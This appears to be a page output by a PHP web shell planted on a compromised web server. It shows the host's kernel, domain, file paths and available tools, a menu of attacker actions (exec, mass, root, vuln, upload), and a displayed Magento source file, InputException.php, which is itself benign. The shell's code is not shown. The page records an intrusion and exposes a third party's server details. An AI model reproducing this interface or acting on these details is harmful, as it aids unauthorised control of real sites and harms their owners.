Kernel : Linux vmi616275.contaboserver.net 5.4.0-84-generic #94-Ubuntu SMP Thu Aug 26 20:27:37 UTC 2021 x86_64
Disable function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Safe mode : OFF
Host : diestoffstrasse.com | Server ip : 127.0.0.1 | Your ip : 127.0.0.1 | Time @ Server : 24 Aug 2025 02:54:10
MySQL : OFF | MSSQL : OFF | cURL : ON | Oracle : OFF | wget : ON | Perl : ON

/home/dev2.destoffenstraat.com/vendor-1/magento/framework/Exception/

HOME about upload exec mass file domain root vuln newfile newfolder kill me

File Path : /home/dev2.destoffenstraat.com/vendor-1/magento/framework/Exception/InputException.php

<?php /** * Copyright © Magento, Inc. All rights reserved. * See COPYING.txt for license details. */ namespace Magento\Framework\Exception; use Magento\Framework\Phrase; /** * Exception to be thrown when there is an issue with the Input to a function call. * * @api * @since 100.0.2 */ class InputException extends AbstractAggregateException { /** * @deprecated */ const DEFAULT_MESSAGE = 'One or more input exceptions have occurred.'; /** * @deprecated */ const INVALID_FIELD_RANGE = 'The %fieldName value of "%value" must be between %minValue and %maxValue'; /** * @deprecated */ const INVALID_FIELD_MIN_VALUE = 'The %fieldName value of "%value" must be greater than or equal to %minValue.'; /** * @deprecated */ const INVALID_FIELD_MAX_VALUE = 'The %fieldName value of "%value" must be less than or equal to %maxValue.'; /** * @deprecated */ const INVALID_FIELD_VALUE = 'Invalid value of "%value" provided for the %fieldName field.'; /** * @deprecated */ const REQUIRED_FIELD = '"%fieldName" is required. Enter and try again.'; /** * Initialize the input exception. * * @param \Magento\Framework\Phrase $phrase * @param \Exception $cause * @param int $code */ public function __construct(Phrase $phrase = null, \Exception $cause = null, $code = 0) { if ($phrase === null) { $phrase = new Phrase('One or more input exceptions have occurred.'); } parent::__construct($phrase, $cause, $code); } /** * Creates an InputException for when a specific field was provided with an invalid value. * * @param string $fieldName Name of the field which had an invalid value provided. * @param string $fieldValue The invalid value that was provided for the field. * @param \Exception $cause Cause of the InputException * @return \Magento\Framework\Exception\InputException */ public static function invalidFieldValue($fieldName, $fieldValue, \Exception $cause = null) { return new self( new Phrase( 'Invalid value of "%value" provided for the %fieldName field.', ['fieldName' => $fieldName, 'value' => $fieldValue] ), $cause ); } /** * Creates an InputException for a missing required field. * * @param string $fieldName Name of the missing required field. * @return \Magento\Framework\Exception\InputException */ public static function requiredField($fieldName) { return new self( new Phrase('"%fieldName" is required. Enter and try again.', ['fieldName' => $fieldName]) ); } }